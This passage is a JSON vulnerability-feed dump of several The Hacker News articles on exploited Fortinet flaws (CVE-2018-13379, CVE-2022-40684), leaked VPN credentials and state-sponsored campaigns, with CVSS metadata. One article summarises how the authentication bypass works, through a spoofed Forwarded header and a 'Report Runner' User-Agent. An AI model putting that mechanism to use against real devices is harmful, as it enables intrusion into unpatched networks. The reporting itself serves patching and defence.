"NONE"}, "impactScore": 5.9}, "published": "2022-02-18T07:40:00", "type": "thn", "title": "Iranian Hackers Targeting VMware Horizon Log4j Flaws to Deploy Ransomware", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2022-02-18T07:40:44", "id": "THN:F25FAD25E15EBBE4934883ABF480294D", "href": "https://thehackernews.com/2022/02/iranian-hackers-targeting-vmware.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-09-09T08:35:28", "description": "[](<https://thehackernews.com/images/-05Y4azfOtHY/YTmz5X6CzVI/AAAAAAAADwU/FmcJruB5qJM-D9XZtYFV-FPRYfwHpYpHwCLcBGAsYHQ/s0/vpng.jpg>)\n\nNetwork security solutions provider Fortinet confirmed that a malicious actor had unauthorizedly disclosed VPN login names and passwords associated with 87,000 FortiGate SSL-VPN devices.\n\n\"These credentials were obtained from systems that remained unpatched against [CVE-2018-13379](<https://www.fortiguard.com/psirt/FG-IR-18-384>) at the time of the actor's scan. While they may have since been patched, if the passwords were not reset, they remain vulnerable,\" the company [said](<https://www.fortinet.com/blog/psirt-blogs/malicious-actor-discloses-fortigate-ssl-vpn-credentials>) in a statement on Wednesday.\n\nThe disclosure comes after the threat actor leaked a list of Fortinet credentials for free on a new Russian-speaking forum called [RAMP](<https://ke-la.com/new-russian-speaking-forum-a-new-place-for-raas/>) that launched in July 2021 as well as on Groove ransomware's data leak site, with Advanced Intel [noting](<https://www.advintel.io/post/groove-vs-babuk-groove-ransom-manifesto-ramp-underground-platform-secret-inner-workings>) that the \"breach list contains raw access to the top companies\" spanning across 74 countries, including India, Taiwan, Italy, France, and Israel. \"2,959 out of 22,500 victims are U.S. entities,\" the researchers said.\n\n[](<https://thehackernews.com/images/-HU-9TZrc8Wo/YTm0pyWYXXI/AAAAAAAADwc/12l08TWEhOUM6FKznJkQu0G8qDlpbkrcACLcBGAsYHQ/s0/leak.jpg>)\n\n[CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) relates to a path traversal vulnerability in the FortiOS SSL VPN web portal, which allows unauthenticated attackers to read arbitrary system files, including the session file, which contains usernames and passwords stored in plaintext. \n\nAlthough the bug was rectified in May 2019, the security weakness has been [repeatedly](<https://thehackernews.com/2020/02/iranian-hackers-vpn-vulnerabilities.html>) [exploited](<https://thehackernews.com/2021/04/fbi-cisa-uncover-tactics-employed-by.html>) by [multiple](<https://thehackernews.com/2021/04/hackers-exploit-unpatched-vpns-to.html>) [adversaries](<https://thehackernews.com/2021/05/data-wiper-malware-disguised-as.html>) to deploy an array of [malicious payloads](<https://thehackernews.com/2021/05/top-11-security-flaws-russian-spy.html>) on unpatched devices, prompting Fortinet to issue a series of advisories in [August 2019](<https://www.fortinet.com/blog/psirt-blogs/fortios-ssl-vulnerability>), [July 2020](<https://www.fortinet.com/blog/psirt-blogs/atp-29-targets-ssl-vpn-flaws>), [April 2021](<https://www.fortinet.com/blog/psirt-blogs/patch-vulnerability-management>), and again in [June 2021](<https://www.fortinet.com/blog/psirt-blogs/prioritizing-patching-is-essential-for-network-integrity>), urging customers to upgrade affected appliances.\n\n[](<https://thehackernews.com/images/-qUrCccGMLeI/YTm0raORfPI/AAAAAAAADwg/R5dmT1pkUKwnRGYKr_SGB-GiTdIvnz1GACLcBGAsYHQ/s0/stats.jpg>)\n\nCVE-2018-13379 also emerged as one of the [top most exploited flaws](<https://thehackernews.com/2021/07/top-30-critical-security.html>) in 2020, according to a list compiled by intelligence agencies in Australia, the U.K., and the U.S. earlier this year.\n\nIn light of the leak, Fortinet is recommending companies to immediately disable all VPNs, upgrade the devices to FortiOS 5.4.13, 5.6.14, 6.0.11, or 6.2.8 and above followed by initiating an organization-wide password reset, warning that \"you may remain vulnerable post-upgrade if your users' credentials were previously compromised.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-09T07:16:00", "type": "thn", "title": "Hackers Leak VPN Account Passwords From 87,000 Fortinet FortiGate Devices", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2021-09-09T07:33:52", "id": "THN:8483C1B45A5D7BF5D501DE72F5898935", "href": "https://thehackernews.com/2021/09/hackers-leak-vpn-account-passwords-from.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-12T16:30:00", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhe-JObfxreJe3voT0gU0S71E013xl9EJTptEvFiIYrrr0cMALdF9FZR1Rc20JN7zmeC4ZC5In7OgjeASatCBiVJAMoaOPzikA75p2359zbFIla4cniv7wHpmaLMdvm4vDQ1qBrj6xaxkI0kesF0zlPgDbBpWlIDP7pInkBzVTb9UE9n5Gq14Dnjpq2/s728-e100/firewall.jpg>)\n\nFortinet on Monday revealed that the newly patched critical security vulnerability impacting its firewall and proxy products is being actively exploited in the wild.\n\nTracked as [CVE-2022-40684](<https://thehackernews.com/2022/10/fortinet-warns-of-new-auth-bypass-flaw.html>) (CVSS score: 9.6), the flaw relates to an authentication bypass in FortiOS, FortiProxy, and FortiSwitchManager that could allow a remote attacker to perform unauthorized operations on the administrative interface via specially crafted HTTP(S) requests.\n\n\"Fortinet is aware of an instance where this vulnerability was exploited, and recommends immediately validating your systems against the following indicator of compromise in the device's logs: user='Local_Process_Access,'\" the company [noted](<https://www.fortiguard.com/psirt/FG-IR-22-377>) in an advisory.\n\nThe list of impacted devices is below -\n\n * FortiOS version 7.2.0 through 7.2.1\n * FortiOS version 7.0.0 through 7.0.6\n * FortiProxy version 7.2.0\n * FortiProxy version 7.0.0 through 7.0.6\n * FortiSwitchManager version 7.2.0, and\n * FortiSwitchManager version 7.0.0\n\nUpdates have been released by the security company in FortiOS versions 7.0.7 and 7.2.2, FortiProxy versions 7.0.7 and 7.2.1, and FortiSwitchManager version 7.2.1.\n\nThe disclosure comes days after Fortinet [sent](<https://thehackernews.com/2022/10/fortinet-warns-of-new-auth-bypass-flaw.html>) \"confidential advance customer communications\" to its customers, urging them to apply patches to mitigate potential attacks exploiting the flaw.\n\nIf updating to the latest version isn't an option, it's recommended that users disable the HTTP/HTTPS administrative interface, or alternatively limit IP addresses that can access the administrative interface.\n\n**_Update:_** The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday [added](<https://www.cisa.gov/uscert/ncas/current-activity/2022/10/11/cisa-has-added-one-known-exploited-vulnerability-catalog>) the Fortinet flaw to its Known Exploited Vulnerabilities ([KEV](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>)) catalog, requiring federal agencies to apply patches by November 1, 2022.\n\nDetails and proof-of-concept (PoC) code for the vulnerability are [expected to become publicly available](<https://www.horizon3.ai/fortinet-iocs-cve-2022-40684/>) in the coming days, in a move that could enable other threat actors to adopt the exploit to their toolset and mount their own attacks.\n\n\"Vulnerabilities affecting devices on the edge of corporate networks are among the most sought after by threat actors because it leads to breaching the perimeter, and CVE-2022-40684 allows exactly this,\" Zach Hanley, chief attack engineer at Horizon3.ai, said.\n\n\"Past Fortinet vulnerabilities, like [CVE-2018-13379](<https://thehackernews.com/2021/09/hackers-leak-vpn-account-passwords-from.html>), have remained some of the [top exploited vulnerabilities](<https://thehackernews.com/2021/07/top-30-critical-security.html>) over the years and this one will likely be no different.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-11T06:21:00", "type": "thn", "title": "Fortinet Warns of Active Exploitation of Newly Discovered Critical Auth Bypass Bug", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2022-40684"], "modified": "2022-10-12T13:16:52", "id": "THN:63560DA43FB5804E3B258BC62E210EC4", "href": "https://thehackernews.com/2022/10/fortinet-warns-of-active-exploitation.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-15T04:05:18", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiHjIXiW2zuHYHOZQbJKZD4p4uzwJHQdTAWhDUrxnxbxqVorwddxJ6Glgo6ERl_J1sIvlUI3AI6uug4KNSzj7-i_k6bmiZJO4-l33F5VRyfcJmN6tJHyz9cKIzx_FfcSyhR9ddrcoCcb5Gk5FgGjBg56GhIjX6JM3s3HkJJ7D0YkFii0-2B4IILpOZS/s728-e100/hack.jpg>)\n\nA proof-of-concept (PoC) exploit code has been made available for the recently disclosed critical security flaw affecting Fortinet FortiOS, FortiProxy, and FortiSwitchManager, making it imperative that users move quickly to apply the patches.\n\n\"FortiOS exposes a management web portal that allows a user to configure the system,\" Horizon3.ai researcher James Horseman [said](<https://www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684/>). \"Additionally, a user can SSH into the system which exposes a locked down CLI interface.\"\n\nThe issue, tracked as [CVE-2022-40684](<https://thehackernews.com/2022/10/fortinet-warns-of-new-auth-bypass-flaw.html>) (CVSS score: 9.6), concerns an [authentication bypass](<https://www.horizon3.ai/fortinet-iocs-cve-2022-40684/>) vulnerability that could allow a remote attacker to perform malicious operations on the administrative interface via specially crafted HTTP(S) requests.\n\nA successful exploitation of the shortcoming is tantamount to granting complete access \"to do just about anything\" on the affected system, including altering network configurations, adding malicious users, and intercepting network traffic.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjRUF5zXRq0j7JtozHreYQFvBZmHZaK79k53nzd5BkO7GRapjoRFkekYnIkcLCXVxw9mkLJS3UHKjGxK35wSa1VoHFc0Zf6y_GWxV0-TUy9uwKyXDgo3Jfsu6LvlLgEj49ayxN49j9vIbADLJYnPG5XgMHOvHquE-zMEAI94s02hvVLk4tDyYrLSqz4/s728-e100/poc.jpg>)\n\nThat said, the cybersecurity firm said that there are two essential prerequisites when making such a request -\n\n * Using the Forwarded header, an attacker is able to set the client_ip to \"127.0.0.1\"\n * The \"trusted access\" authentication check verifies that the client_ip is \"127.0.0.1\" and the User-Agent is \"Report Runner\" both of which are under attacker control\n\nThe release of the PoC comes as Fortinet [cautioned](<https://thehackernews.com/2022/10/fortinet-warns-of-active-exploitation.html>) that it's already aware of an instance of active exploitation of the flaw in the wild, prompting the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to issue an advisory urging federal agencies to patch the issue by November 1, 2022.\n\nThreat intelligence firm GreyNoise has [detected](<https://viz.greynoise.io/tag/fortios-authentication-bypass-attempt?days=30>) 12 unique IP addresses weaponizing CVE-2022-40684 as of October 13, 2022, with a majority of them [located](<https://viz.greynoise.io/query/?gnql=cve%3ACVE-2022-40684>) in Germany, followed by the U.S., Brazil, China, and France.\n\nWordPress security company WordFence also said it [identified](<https://www.wordfence.com/blog/2022/10/threat-advisory-cve-2022-40684-fortinet-appliance-auth-bypass/>) probing attempts from 21 different IP addresses to \"determine whether a Fortinet appliance is in place,\" while also observing HTTP requests matching the PoC to add an SSH key to the admin user.\n\n**_Update:_** Amid a [huge uptick](<https://viz.greynoise.io/tag/fortios-authentication-bypass-attempt?days=30>) in vulnerability scans for the authentication bypass vulnerability, Fortinet on Friday released another advisory urging customers to upgrade affected appliances to the latest version as soon as possible.\n\n\"After multiple notifications from Fortinet over the past week, there are still a significant number of devices that require mitigation, and following the publication by an outside party of POC code, there is active exploitation of this vulnerability,\" the company [said](<https://www.fortinet.com/blog/psirt-blogs/update-regarding-cve-2022-40684>).\n\nIssues in Fortinet devices have been previously targeted by attackers to gain an initial foothold onto target networks. [CVE-2018-13379](<https://thehackernews.com/2021/09/hackers-leak-vpn-account-passwords-from.html>), which has remained one of the most weaponized flaws in recent years, prompted the firm to issue [three follow-up alerts](<https://thehackernews.com/2021/04/hackers-exploit-unpatched-vpns-to.html>) in August 2019, July 2020, and again in April 2021.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-14T03:35:00", "type": "thn", "title": "PoC Exploit Released for Critical Fortinet Auth Bypass Bug Under Active Attacks", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2022-40684"], "modified": "2022-10-15T02:56:36", "id": "THN:3474CD6C25ADD60FF37EDC1774311111", "href": "https://thehackernews.com/2022/10/poc-exploit-released-for-critical.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-05-09T12:37:33", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEgfHxH3Dt4VXRfmdH7Z5AIzdTH11h4caDd4ap4XoxMEluunQIHIKcMfsOmGXHYfBm80iV7yauBv6comuqDI53yYZ-scRdempbDZFRKoVre0dwv8XB-HY7OuqI3zugrjX_AU4O94F-ikvT5ttBGEc9cGB3wRTB1Tkpo2jFZZ5dobK0ftUAK2GlxVr_sa>)\n\nState-sponsored actors backed by the Russian government regularly targeted the networks of several U.S. cleared defense contractors (CDCs) to acquire proprietary documents and other confidential information pertaining to the country's defense and intelligence programs and capabilities.\n\nThe sustained espionage campaign is said to have commenced at least two years ago from January 2020, according to a [joint advisory](<https://www.cisa.gov/news/2022/02/16/new-cybersecurity-advisory-protecting-cleared-defense-contractor-networks-against>) published by the U.S. Federal Bureau of Investigation (FBI), National Security Agency (NSA), and Cybersecurity and Infrastructure Security Agency (CISA).\n\n\"These continued intrusions have enabled the actors to acquire sensitive, unclassified information, as well as CDC-proprietary and export-controlled technology,\" the agencies [said](<https://www.cisa.gov/uscert/ncas/alerts/aa22-047a>). \"The acquired information provides significant insight into U.S. weapons platforms development and deployment timelines, vehicle specifications, and plans for communications infrastructure and information technology.\"\n\nCompromised entities include contractors that dabble in command, control, communications, and combat systems; surveillance and reconnaissance; weapons and missile development; vehicle and aircraft design; and software development, data analytics, and logistics.\n\nThe threat actors rely on \"common but effective\" tactics to breach target networks such as spear-phishing, credential harvesting, brute-force attacks, password spray techniques, and exploitation of known vulnerabilities in VPN devices, before moving laterally to establish persistence and exfiltrate data.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEj72CV_TZddW8ZEFbbWJoksQeXFXLFFSgoy22sgxewm7OT-W5YDgBIqLdOhdUK4p3Z5AV32z7EtFYvCInbCCdVzX37Wzqx1TL_G6NeQuEKUOLVC6371dcORdcP2owx3pnjKJyUaGJCQ56o-mLZcUzXswT3hUvEKbXxZBzEmEt8nYAClgNN9xU4V4anK>)\n\nSome of the [vulnerabilities](<https://thehackernews.com/2021/11/us-uk-and-australia-warn-of-iranian.html>) leveraged by the attackers for initial access and privilege escalation are as follows \u2013\n\n * [**CVE-2018-13379**](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) (CVSS score: 9.8) \u2013 FortiOS system file leak through SSL VPN via specially crafted HTTP resource requests\n * [**CVE-2020-0688**](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>) (CVSS score: 8.8) \u2013 Microsoft Exchange validation key remote code execution vulnerability\n * [**CVE-2020-17144**](<https://nvd.nist.gov/vuln/detail/CVE-2020-17144>) (CVSS score: 8.4) \u2013 Microsoft Exchange remote code execution vulnerability\n\nMany of the intrusions also involve gaining a foothold to enterprise and cloud networks, with the adversaries maintaining persistent access to the compromised Microsoft 365 environments for as long as six months to repeatedly harvest emails and data.\n\n\"As CDCs find and patch known vulnerabilities on their networks, the actors alter their tradecraft to seek new means of access,\" the agencies explained. \"This activity necessitates CDCs maintain constant vigilance for software vulnerabilities and out-of-date security configurations, especially in internet-facing systems.\"\n\nAmong other malicious activities observed is the routine use of virtual private servers (VPSs) as an encrypted proxy and the use of legitimate credentials to exfiltrate emails from the victim's enterprise email system. The advisory, however, does not single out any Russian state actor by name.\n\n\"Over the last several years, Russian state-sponsored cyber actors have been persistent in targeting U.S. cleared defense contractors to get at sensitive information,\" [said](<https://www.nsa.gov/Press-Room/News-Highlights/Article/Article/2935170/nsa-fbi-cisa-release-advisory-on-protecting-cleared-defense-contractor-networks/>) Rob Joyce, director of NSA Cybersecurity. \"Armed with insights like these, we can better detect and defend important assets together.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-17T05:42:00", "type": "thn", "title": "U.S. Says Russian Hackers Stealing Sensitive Data from Defense Contractors", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2020-0688", "CVE-2020-17144"], "modified": "2022-02-17T13:01:50", "id": "THN:80D2DBC4130D9FF314BDC4C19EB5CD4E", "href": "https://thehackernews.com/2022/02/us-says-russian-hackers-stealing.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T03:29:54", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjhNJNYKsz0zRz-CzaUqAm2MRgt6hyl7sq05Q-XnbDm2VwMedx339MqSyZOAKaZNIywGOU7b4usV_c7PkobISvqG4n1OWRAK6MowARD4h2L_HH0soDHDxo-HLg5bT1n0PRyLyda5DamIal3W2BOTcPpLYlDUc8cUHZ5tqR_YBCcyTEpn2SBhSPC2m-r/s728-e100/flaws.gif>)\n\n[Log4Shell](<https://thehackernews.com/2021/12/new-apache-log4j-update-released-to.html>), [ProxyShell](<https://thehackernews.com/2021/11/hackers-exploiting-proxylogon-and.html>), [ProxyLogon](<https://thehackernews.com/2021/03/microsoft-exchange-cyber-attack-what-do.html>), [ZeroLogon](<https://thehackernews.com/2020/09/detecting-and-preventing-critical.html>), and flaws in [Zoho ManageEngine AD SelfService Plus](<https://thehackernews.com/2021/09/cisa-warns-of-actively-exploited-zoho.html>), [Atlassian Confluence](<https://thehackernews.com/2021/09/atlassian-confluence-rce-flaw-abused-in.html>), and [VMware vSphere Client](<https://thehackernews.com/2021/02/critical-rce-flaw-affects-vmware.html>) emerged as some of the top exploited security vulnerabilities in 2021.\n\nThat's according to a \"[Top Routinely Exploited Vulnerabilities](<https://www.cisa.gov/uscert/ncas/alerts/aa22-117a>)\" report released by cybersecurity authorities from the Five Eyes nations Australia, Canada, New Zealand, the U.K., and the U.S.\n\nOther frequently weaponized flaws included a remote code execution bug in Microsoft Exchange Server ([CVE-2020-0688](<https://thehackernews.com/2021/07/top-30-critical-security.html>)), an arbitrary file read vulnerability in Pulse Secure Pulse Connect Secure ([CVE-2019-11510](<https://thehackernews.com/2020/04/pulse-secure-vpn-vulnerability.html>)), and a path traversal defect in Fortinet FortiOS and FortiProxy ([CVE-2018-13379](<https://thehackernews.com/2021/09/hackers-leak-vpn-account-passwords-from.html>)).\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjV_5FJTAhnIsR8JgqL9uQg0ZFxcNG_CjB_UQkbmLMHp3ywOvVYK21BPlGIrlFOkrpjXKZTudyfgIFVbvdoCqezanw_M902zAF_j0D0iiMlBFYA9xgTU3PqsuazBsluMEFz04W5fr6wR3IcoNmrMSzQaRgR5ai54nGTQjKTBNImgKDAlUP3blp4-t8a/s728-e100/cisa.jpg>)\n\nNine of the top 15 routinely exploited flaws were remote code execution vulnerabilities, followed by two privilege escalation weaknesses, and one each of security feature bypass, arbitrary code execution, arbitrary file read, and path traversal flaws.\n\n\"Globally, in 2021, malicious cyber actors targeted internet-facing systems, such as email servers and virtual private network (VPN) servers, with exploits of newly disclosed vulnerabilities,\" the agencies said in a joint advisory.\n\n\"For most of the top exploited vulnerabilities, researchers or other actors released proof of concept (PoC) code within two weeks of the vulnerability's disclosure, likely facilitating exploitation by a broader range of malicious actors.\"\n\nTo mitigate the risk of exploitation of publicly known software vulnerabilities, the agencies are recommending organizations to apply patches in a timely fashion and implement a centralized patch management system.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-28T05:41:00", "type": "thn", "title": "U.S. Cybersecurity Agency Lists 2021's Top 15 Most Exploited Software Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2020-0688"], "modified": "2022-05-09T02:55:12", "id": "THN:3266EB2F73FA4A955845C8FEBA4E73C5", "href": "https://thehackernews.com/2022/04/us-cybersecurity-agency-lists-2021s-top.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:05", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEhKbdRreQ0Go0a6_nNV2mIHF-M4tF8ltZLh-zKh9XlGWei6N3zGQptPV2EVnu-c2aHwmgFtWbz4Xq0tDXGz3Z1dpDgiPu7RVWIwM8bhdGXus6httFDg3Syq5PSXHPDJiYhDv0KxH-eo9jncYNJb4pG6nA_987ryEtxPoAJr1RlSMcy7wdD0dNr3L2mW>)\n\nCybersecurity agencies from Australia, the U.K., and the U.S. on Wednesday [released](<https://us-cert.cisa.gov/ncas/current-activity/2021/11/17/iranian-government-sponsored-apt-cyber-actors-exploiting-microsoft>) a joint advisory warning of active exploitation of Fortinet and Microsoft Exchange ProxyShell vulnerabilities by Iranian state-sponsored actors to gain initial access to vulnerable systems for follow-on activities, including data exfiltration and ransomware.\n\nThe threat actor is believed to have leveraged multiple Fortinet FortiOS vulnerabilities dating back to March 2021 as well as a remote code execution flaw affecting Microsoft Exchange Servers since at least October 2021, according to the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), the Australian Cyber Security Centre (ACSC), and the U.K.'s National Cyber Security Centre (NCSC).\n\nThe agencies did not attribute the activities to a specific advanced persistent threat (APT) actor. Targeted victims include Australian organizations and a wide range of entities across multiple U.S. critical infrastructure sectors, such as transportation and healthcare. The list of flaws being exploited are below \u2014\n\n * [**CVE-2021-34473**](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473>) (CVSS score: 9.1) - Microsoft Exchange Server remote code execution vulnerability (aka \"[ProxyShell](<https://thehackernews.com/2021/08/microsoft-exchange-under-attack-with.html>)\")\n * [**CVE-2020-12812**](<https://nvd.nist.gov/vuln/detail/CVE-2020-12812>) (CVSS score: 9.8) - [FortiOS SSL VPN 2FA bypass](<https://thehackernews.com/2021/08/unpatched-remote-hacking-zero-day-flaw.html>) by changing username case\n * [**CVE-2019-5591**](<https://nvd.nist.gov/vuln/detail/CVE-2019-5591>) (CVSS score: 6.5) - FortiGate [default configuration](<https://thehackernews.com/2021/08/unpatched-remote-hacking-zero-day-flaw.html>) does not verify the LDAP server identity\n * [**CVE-2018-13379**](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) (CVSS score: 9.8) - [FortiOS system file leak](<https://thehackernews.com/2021/09/hackers-leak-vpn-account-passwords-from.html>) through SSL VPN via specially crafted HTTP resource requests\n\nBesides exploiting the ProxyShell flaw to gain access to vulnerable networks, CISA and FBI said they observed the adversary abusing a Fortigate appliance in May 2021 to gain a foothold to a web server hosting the domain for a U.S. municipal government. The next month, the APT actors \"exploited a Fortigate appliance to access environmental control networks associated with a U.S.-based hospital specializing in healthcare for children,\" the advisory said.\n\nThe development marks the second time the U.S. government has [alerted](<https://thehackernews.com/2021/08/unpatched-remote-hacking-zero-day-flaw.html>) of advanced persistent threat groups targeting Fortinet FortiOS servers by leveraging CVE-2018-13379, CVE-2020-12812, and CVE-2019-5591 to compromise systems belonging to government and commercial entities.\n\nAs mitigations, the agencies are recommending organizations to immediately patch software affected by the aforementioned vulnerabilities, enforce data backup and restoration procedures, implement network segmentation, secure accounts with multi-factor authentication, and patch operating systems, software, and firmware as and when updates 